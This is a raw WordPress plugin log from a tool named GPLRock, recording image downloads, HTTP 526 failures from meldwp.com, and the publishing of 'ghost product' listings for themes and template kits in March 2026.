/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f0e211e.jpg [10-Mar-2026 08:50:10 UTC] GPLRock: Using pre-downloaded image for product qahira-umrah-hajj-tour-travel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f0e211e.jpg [10-Mar-2026 08:50:10 UTC] GPLRock: Ghost product published with image - Product ID: qahira-umrah-hajj-tour-travel-elementor-template-kit [10-Mar-2026 08:50:11 UTC] GPLRock: Image downloaded successfully for product importwp-pro-wordpress-xml-csv-importer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca2fba0e.jpg [10-Mar-2026 08:50:11 UTC] GPLRock: Using pre-downloaded image for product importwp-pro-wordpress-xml-csv-importer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca2fba0e.jpg [10-Mar-2026 08:50:11 UTC] GPLRock: Ghost product published with image - Product ID: importwp-pro-wordpress-xml-csv-importer [10-Mar-2026 08:50:12 UTC] GPLRock: Image downloaded successfully for product breakdance-pro-gpl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a9c3410.webp [10-Mar-2026 08:50:12 UTC] GPLRock: Using pre-downloaded image for product breakdance-pro-gpl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a9c3410.webp [10-Mar-2026 08:50:12 UTC] GPLRock: Ghost product published with image - Product ID: breakdance-pro-gpl [10-Mar-2026 08:50:14 UTC] GPLRock: Image downloaded successfully for product yachbat-yacht-boat-rental-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-435e1ca4.jpg [10-Mar-2026 08:50:14 UTC] GPLRock: Using pre-downloaded image for product yachbat-yacht-boat-rental-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-435e1ca4.jpg [10-Mar-2026 08:50:14 UTC] GPLRock: Ghost product published with image - Product ID: yachbat-yacht-boat-rental-wordpress-theme [10-Mar-2026 08:50:15 UTC] GPLRock: Image downloaded successfully for product gostore-elementor-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ec11a0b.jpg [10-Mar-2026 08:50:15 UTC] GPLRock: Using pre-downloaded image for product gostore-elementor-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ec11a0b.jpg [10-Mar-2026 08:50:15 UTC] GPLRock: Ghost product published with image - Product ID: gostore-elementor-woocommerce-wordpress-theme [10-Mar-2026 08:50:16 UTC] GPLRock: Image downloaded successfully for product mini-onepage-personal-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbb52cb8.jpg [10-Mar-2026 08:50:16 UTC] GPLRock: Using pre-downloaded image for product mini-onepage-personal-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbb52cb8.jpg [10-Mar-2026 08:50:16 UTC] GPLRock: Ghost product published with image - Product ID: mini-onepage-personal-portfolio-theme [10-Mar-2026 08:50:17 UTC] GPLRock: Image downloaded successfully for product sixten-minimalist-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9f277bb.jpg [10-Mar-2026 08:50:17 UTC] GPLRock: Using pre-downloaded image for product sixten-minimalist-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9f277bb.jpg [10-Mar-2026 08:50:17 UTC] GPLRock: Ghost product published with image - Product ID: sixten-minimalist-portfolio-wordpress-theme [10-Mar-2026 08:50:18 UTC] GPLRock: Image downloaded successfully for product supro-minimalist-ajax-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a145b8d7.jpg [10-Mar-2026 08:50:18 UTC] GPLRock: Using pre-downloaded image for product supro-minimalist-ajax-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a145b8d7.jpg [10-Mar-2026 08:50:18 UTC] GPLRock: Ghost product published with image - Product ID: supro-minimalist-ajax-woocommerce-wordpress-theme [10-Mar-2026 09:43:23 UTC] GPLRock: Image download failed for product lexal-personal-portfolio-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:25 UTC] GPLRock: Image download failed for product lexal-personal-portfolio-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lexal---personal--portfolio--resume-wordpress-theme-3944.webp for product lexal-personal-portfolio-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:27 UTC] GPLRock: Image download failed for product lexal-personal-portfolio-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:29 UTC] GPLRock: Image download failed for product lexal-personal-portfolio-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lexal---personal--portfolio--resume-wordpress-theme-3944.webp for product lexal-personal-portfolio-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:31 UTC] GPLRock WARNING: Image download failed for product lexal-personal-portfolio-resume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lexal---personal--portfolio--resume-wordpress-theme-3944.webp [10-Mar-2026 09:43:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lexal-personal-portfolio-resume-wordpress-theme [10-Mar-2026 09:43:31 UTC] GPLRock: Image downloaded successfully for product elroyale-restaurant-cafe-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82a69866.webp [10-Mar-2026 09:43:31 UTC] GPLRock: Using pre-downloaded image for product elroyale-restaurant-cafe-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82a69866.webp [10-Mar-2026 09:43:31 UTC] GPLRock: Ghost product published with image - Product ID: elroyale-restaurant-cafe-wordpress-theme [10-Mar-2026 09:43:31 UTC] GPLRock: Image download failed for product asri-multi-purpose-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:34 UTC] GPLRock: Image download failed for product asri-multi-purpose-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/asri---multi-purpose-elementor-wordpress-theme-33553.webp for product asri-multi-purpose-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:36 UTC] GPLRock: Image download failed for product asri-multi-purpose-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:38 UTC] GPLRock: Image download failed for product asri-multi-purpose-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/asri---multi-purpose-elementor-wordpress-theme-33553.webp for product asri-multi-purpose-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:40 UTC] GPLRock WARNING: Image download failed for product asri-multi-purpose-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/asri---multi-purpose-elementor-wordpress-theme-33553.webp [10-Mar-2026 09:43:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: asri-multi-purpose-elementor-wordpress-theme [10-Mar-2026 09:43:40 UTC] GPLRock: Image downloaded successfully for product sorex-creative-agency-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40dcb591.webp [10-Mar-2026 09:43:40 UTC] GPLRock: Using pre-downloaded image for product sorex-creative-agency-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40dcb591.webp [10-Mar-2026 09:43:40 UTC] GPLRock: Ghost product published with image - Product ID: sorex-creative-agency-portfolio-wordpress-theme [10-Mar-2026 09:43:41 UTC] GPLRock: Image download failed for product fladient-app-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:43 UTC] GPLRock: Image download failed for product fladient-app-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fladient---app--saas-wordpress-theme-29907.webp for product fladient-app-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:46 UTC] GPLRock: Image download failed for product fladient-app-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:48 UTC] GPLRock: Image download failed for product fladient-app-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fladient---app--saas-wordpress-theme-29907.webp for product fladient-app-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:50 UTC] GPLRock WARNING: Image download failed for product fladient-app-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fladient---app--saas-wordpress-theme-29907.webp [10-Mar-2026 09:43:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fladient-app-saas-wordpress-theme [10-Mar-2026 09:43:51 UTC] GPLRock: Image download failed for product intellicon-ai-machine-learning-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:53 UTC] GPLRock: Image download failed for product intellicon-ai-machine-learning-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intellicon---ai--machine-learning-wordpress-theme-19263.webp for product intellicon-ai-machine-learning-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:43:56 UTC] GPLRock: Image download failed for product intellicon-ai-machine-learning-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:43:58 UTC] GPLRock: Image download failed for product intellicon-ai-machine-learning-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intellicon---ai--machine-learning-wordpress-theme-19263.webp for product intellicon-ai-machine-learning-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:44:00 UTC] GPLRock WARNING: Image download failed for product intellicon-ai-machine-learning-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/intellicon---ai--machine-learning-wordpress-theme-19263.webp [10-Mar-2026 09:44:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: intellicon-ai-machine-learning-wordpress-theme [10-Mar-2026 09:44:00 UTC] GPLRock: Image download failed for product zebre-freelancer-agency-portfolio-minimal-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:02 UTC] GPLRock: Image download failed for product zebre-freelancer-agency-portfolio-minimal-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zebre---freelancer--agency-portfolio-minimal-wp-theme-2478.webp for product zebre-freelancer-agency-portfolio-minimal-wp-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:44:05 UTC] GPLRock: Image download failed for product zebre-freelancer-agency-portfolio-minimal-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:07 UTC] GPLRock: Image download failed for product zebre-freelancer-agency-portfolio-minimal-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zebre---freelancer--agency-portfolio-minimal-wp-theme-2478.webp for product zebre-freelancer-agency-portfolio-minimal-wp-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:44:09 UTC] GPLRock WARNING: Image download failed for product zebre-freelancer-agency-portfolio-minimal-wp-theme. URL: https://meldwp.com/wp-content/uploads/zebre---freelancer--agency-portfolio-minimal-wp-theme-2478.webp [10-Mar-2026 09:44:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zebre-freelancer-agency-portfolio-minimal-wp-theme [10-Mar-2026 09:44:09 UTC] GPLRock: Image download failed for product lets-play-hockey-school-winter-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:11 UTC] GPLRock: Image download failed for product lets-play-hockey-school-winter-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lets-play--hockey-school--winter-sports-wordpress-theme-31963.webp for product lets-play-hockey-school-winter-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:44:14 UTC] GPLRock: Image download failed for product lets-play-hockey-school-winter-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:16 UTC] GPLRock: Image download failed for product lets-play-hockey-school-winter-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lets-play--hockey-school--winter-sports-wordpress-theme-31963.webp for product lets-play-hockey-school-winter-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:44:18 UTC] GPLRock WARNING: Image download failed for product lets-play-hockey-school-winter-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lets-play--hockey-school--winter-sports-wordpress-theme-31963.webp [10-Mar-2026 09:44:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lets-play-hockey-school-winter-sports-wordpress-theme [10-Mar-2026 09:44:18 UTC] GPLRock: Image download failed for product buruhan-a-portfolio-theme-for-freelancers-and-agencies (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:20 UTC] GPLRock: Image download failed for product buruhan-a-portfolio-theme-for-freelancers-and-agencies (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 09:44:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buruhan--a-portfolio-theme-for-freelancers-and-agencies-28795.webp for product buruhan-a-portfolio-theme-for-freelancers-and-agencies after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 09:44:22 UTC] GPLRock: Image download failed for product buruhan-a-portfolio-theme-for-freelancers-and-agencies (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:34 UTC] GPLRock: Image download failed for product studio-zen-photography-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:36 UTC] GPLRock: Image download failed for product studio-zen-photography-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/studio-zen--photography-theme-for-wordpress-28142.webp for product studio-zen-photography-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:14:39 UTC] GPLRock: Image download failed for product studio-zen-photography-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:41 UTC] GPLRock: Image download failed for product studio-zen-photography-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/studio-zen--photography-theme-for-wordpress-28142.webp for product studio-zen-photography-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:14:43 UTC] GPLRock WARNING: Image download failed for product studio-zen-photography-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/studio-zen--photography-theme-for-wordpress-28142.webp [10-Mar-2026 10:14:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: studio-zen-photography-theme-for-wordpress [10-Mar-2026 10:14:43 UTC] GPLRock: Image download failed for product journal-advanced-opencart-theme-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:45 UTC] GPLRock: Image download failed for product journal-advanced-opencart-theme-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/journal---advanced-opencart-theme-builder-5284.webp for product journal-advanced-opencart-theme-builder after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:14:47 UTC] GPLRock: Image download failed for product journal-advanced-opencart-theme-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:49 UTC] GPLRock: Image download failed for product journal-advanced-opencart-theme-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/journal---advanced-opencart-theme-builder-5284.webp for product journal-advanced-opencart-theme-builder after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:14:51 UTC] GPLRock WARNING: Image download failed for product journal-advanced-opencart-theme-builder. URL: https://meldwp.com/wp-content/uploads/journal---advanced-opencart-theme-builder-5284.webp [10-Mar-2026 10:14:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: journal-advanced-opencart-theme-builder [10-Mar-2026 10:14:52 UTC] GPLRock: Image downloaded successfully for product medipress-health-and-doctor-medical-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7684962.webp [10-Mar-2026 10:14:52 UTC] GPLRock: Using pre-downloaded image for product medipress-health-and-doctor-medical-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7684962.webp [10-Mar-2026 10:14:52 UTC] GPLRock: Ghost product published with image - Product ID: medipress-health-and-doctor-medical-wordpress-theme [10-Mar-2026 10:14:52 UTC] GPLRock: Image download failed for product mooseoom-art-gallery-museum-exhibition-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:54 UTC] GPLRock: Image download failed for product mooseoom-art-gallery-museum-exhibition-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mooseoom---art-gallery-museum--exhibition-wordpress-7558.webp for product mooseoom-art-gallery-museum-exhibition-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:14:56 UTC] GPLRock: Image download failed for product mooseoom-art-gallery-museum-exhibition-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:14:58 UTC] GPLRock: Image download failed for product mooseoom-art-gallery-museum-exhibition-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mooseoom---art-gallery-museum--exhibition-wordpress-7558.webp for product mooseoom-art-gallery-museum-exhibition-wordpress after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:00 UTC] GPLRock WARNING: Image download failed for product mooseoom-art-gallery-museum-exhibition-wordpress. URL: https://meldwp.com/wp-content/uploads/mooseoom---art-gallery-museum--exhibition-wordpress-7558.webp [10-Mar-2026 10:15:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mooseoom-art-gallery-museum-exhibition-wordpress [10-Mar-2026 10:15:01 UTC] GPLRock: Image downloaded successfully for product diego-creative-personal-portfolio-resume-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa04e5f6.webp [10-Mar-2026 10:15:01 UTC] GPLRock: Using pre-downloaded image for product diego-creative-personal-portfolio-resume-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa04e5f6.webp [10-Mar-2026 10:15:01 UTC] GPLRock: Ghost product published with image - Product ID: diego-creative-personal-portfolio-resume-wordpress-theme [10-Mar-2026 10:15:01 UTC] GPLRock: Image download failed for product artvista-art-gallery-museum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:03 UTC] GPLRock: Image download failed for product artvista-art-gallery-museum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artvista---art-gallery--museum-wordpress-theme-25852.webp for product artvista-art-gallery-museum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:05 UTC] GPLRock: Image download failed for product artvista-art-gallery-museum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:07 UTC] GPLRock: Image download failed for product artvista-art-gallery-museum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artvista---art-gallery--museum-wordpress-theme-25852.webp for product artvista-art-gallery-museum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:10 UTC] GPLRock WARNING: Image download failed for product artvista-art-gallery-museum-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artvista---art-gallery--museum-wordpress-theme-25852.webp [10-Mar-2026 10:15:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artvista-art-gallery-museum-wordpress-theme [10-Mar-2026 10:15:10 UTC] GPLRock: Image downloaded successfully for product edurock-education-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a6a4eba.webp [10-Mar-2026 10:15:10 UTC] GPLRock: Using pre-downloaded image for product edurock-education-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a6a4eba.webp [10-Mar-2026 10:15:10 UTC] GPLRock: Ghost product published with image - Product ID: edurock-education-wordpress-theme [10-Mar-2026 10:15:10 UTC] GPLRock: Image download failed for product zanna-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:12 UTC] GPLRock: Image download failed for product zanna-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zanna---elementor-woocommerce-theme-24107.webp for product zanna-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:14 UTC] GPLRock: Image download failed for product zanna-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:16 UTC] GPLRock: Image download failed for product zanna-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zanna---elementor-woocommerce-theme-24107.webp for product zanna-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:18 UTC] GPLRock WARNING: Image download failed for product zanna-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/zanna---elementor-woocommerce-theme-24107.webp [10-Mar-2026 10:15:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zanna-elementor-woocommerce-theme [10-Mar-2026 10:15:19 UTC] GPLRock: Image download failed for product borderland-multipurpose-vintage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:21 UTC] GPLRock: Image download failed for product borderland-multipurpose-vintage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/borderland---multipurpose-vintage-wordpress-theme-5466.webp for product borderland-multipurpose-vintage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:23 UTC] GPLRock: Image download failed for product borderland-multipurpose-vintage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:25 UTC] GPLRock: Image download failed for product borderland-multipurpose-vintage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/borderland---multipurpose-vintage-wordpress-theme-5466.webp for product borderland-multipurpose-vintage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:27 UTC] GPLRock WARNING: Image download failed for product borderland-multipurpose-vintage-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/borderland---multipurpose-vintage-wordpress-theme-5466.webp [10-Mar-2026 10:15:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: borderland-multipurpose-vintage-wordpress-theme [10-Mar-2026 10:15:28 UTC] GPLRock: Image download failed for product mountain-creative-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:30 UTC] GPLRock: Image download failed for product mountain-creative-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mountain--creative-one-page-wordpress-theme-33649.webp for product mountain-creative-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:32 UTC] GPLRock: Image download failed for product mountain-creative-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:34 UTC] GPLRock: Image download failed for product mountain-creative-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 10:15:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mountain--creative-one-page-wordpress-theme-33649.webp for product mountain-creative-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 10:15:36 UTC] GPLRock WARNING: Image download failed for product mountain-creative-one-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mountain--creative-one-page-wordpress-theme-33649.webp [10-Mar-2026 10:15:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mountain-creative-one-page-wordpress-theme [11-Mar-2026 03:00:12 UTC] GPLRock: Image downloaded successfully for product handyman-builder-plumber-repair-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ece189f8.webp [11-Mar-2026 03:00:12 UTC] GPLRock: Using pre-downloaded image for product handyman-builder-plumber-repair-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ece189f8.webp [11-Mar-2026 03:00:12 UTC] GPLRock: Ghost product published with image - Product ID: handyman-builder-plumber-repair-service-elementor-template-kit [11-Mar-2026 03:00:13 UTC] GPLRock: Image downloaded successfully for product hando-corporate-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66df4a3d.webp [11-Mar-2026 03:00:13 UTC] GPLRock: Using pre-downloaded image for product hando-corporate-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66df4a3d.webp [11-Mar-2026 03:00:13 UTC] GPLRock: Ghost product published with image - Product ID: hando-corporate-portfolio-elementor-template-kit [11-Mar-2026 03:00:14 UTC] GPLRock: Image downloaded successfully for product envira-gallery-password-protection-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18410fe0.jpg [11-Mar-2026 03:00:14 UTC] GPLRock: Image downloaded successfully for product hammer-minimal-architecture-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2e682f3.webp [11-Mar-2026 03:00:15 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-password-protection-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18410fe0.jpg [11-Mar-2026 03:00:15 UTC] GPLRock: Using pre-downloaded image for product hammer-minimal-architecture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2e682f3.webp [11-Mar-2026 03:00:15 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-password-protection-addon [11-Mar-2026 03:00:15 UTC] GPLRock: Ghost product published with image - Product ID: hammer-minimal-architecture-elementor-template-kit 